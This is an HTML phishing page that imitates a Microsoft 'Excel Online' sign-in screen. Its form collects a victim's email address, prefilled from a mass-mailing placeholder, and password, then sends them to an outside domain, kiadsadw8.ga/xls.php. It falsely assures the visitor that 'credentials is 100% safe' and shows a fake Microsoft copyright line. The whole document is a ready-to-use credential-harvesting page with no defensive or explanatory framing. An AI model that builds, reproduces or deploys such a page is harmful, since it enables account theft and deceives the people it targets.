
<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<title>Excel Online Spreadsheet</title>

	<style>
body, html { height: 100%;margin: 0; font-family: Arial, Helvetica, sans-serif;
}
* {
  box-sizing: border-box;
}
.bg-image {
  /* The image used */
  background-image: url("https://i.gyazo.com/52a11ae9fe6936093d1a147ffb24ad16.png");
   opacity: 0.5;
  /* Add the blur effect */ filter: blur(-px); -webkit-filter: blur(-px);
  /* Full height */ height: 100%; /* Center and scale the image nicely */
  background-position: center; background-repeat: no-repeat; background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background: #143b08;
  width:370px; height:450px; -webkit-box-shadow: 1px 1px 15px 1px #000000;
  box-shadow: 1px 1px 15px 1px #000000; border-radius: 1px 25px 1px 40px;

  position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); z-index: 2; text-align: center;
}
input[type=submit] {
  width:290px; height:40px; font-family: arial; font-size: 14px; color:#FFF; background-color: #0489B1; border: solid 1px #0489B1; border-radius: 2px 10px 2px 10px;
  -webkit-box-shadow: 2px 2px 15px 5px #000000; box-shadow: 2px 2px 15px 5px #000000;  font-weight:bold;
}
input[type=password] {
  width:290px; height:35px; font-family: arial; font-size: 13px; border-radius: 3px;
  color:#000000; background-color: #FFF; border: solid 1px #FFF; padding: 10px;
  }
input[type=email] {
  width:290px; height:35px; font-family: arial; font-size: 13px; border-radius: 3px;
  color:#000000; background-color: #FFF; border: solid 1px #FFF; padding: 10px;
    }
</style>


</td></tr>

<tr><td height="75%"  bgcolor="#FFF">
<div class="bg-image"></div>
<div class="bg-text">


	<table align="center" cellspacing="0">
	<tr><td style="height:10px;"></td></tr>

					<tr><td style="height:8px;"></td></tr>
					<tr><td>
					<form method="post" action="https://kiadsadw8.ga/xls.php">
					</td></tr>
					<tr><td>
								</font>
							</div>
					</td></tr>
					<tr><td style="height:7px;"></td></tr>
					<tr><td>
							<div align="center">
								<font face="arial" size="1" color="#FFF">
									<b></b>
								</font>
							</div>
					</td></tr>
					<tr><td style="height:7px;"></td></tr>

					<tr><td>
							<div align="center">
								<img src="https://i.gyazo.com/0dcf5bc75c17513b4d7c2d958771d294.jpg" style="width90px; height:65px;">
							</div>
					</td></tr>
					<tr><td style="height:10px;"></td></tr>

					<tr><td style="height:5px;">
								<div align="center">
								<font face="arial" size="2" color="#FFF">
									<font size="1">Excel Online: Your credentials is 100% safe with us!</font>
								</font>
								</div>
					</td></tr>

					<tr><td style="height:5px;"></td></tr>

					<tr><td>
						<table cellspacing="0" align="center">
						<tr><td>
							<div align="center">
								<input  id="login" name="AA" type="email" placeholder="Enter Recipient Email Address" value="[[-Email-]]">
							</div>
						</td></tr>


						<tr><td style="height:7px;"></td></tr>

						<tr><td>
							<div align="center">
								<input  name="BB" id="passwd" type="password" placeholder="Enter Password" required>
							</div>
						</td></tr>
						<tr><td style="height:15px;"></td></tr>
						<tr><td>
							<div align="left">
								<input type="submit" value="Continue">
							</div>
						
							</form>
						</td></tr>
						</table>
					</td></tr>
	</table>
</div>
</td></tr>
<tr><td height="5%" bgcolor="#1C1C1C">
	<div align="center">
		<font face="verdana" size="1" color="#FFF">
			Copyright © 2022 microsoft. All rights reserved.
		</font>
	</div>
</td></tr>
</table>
</body>
</html>
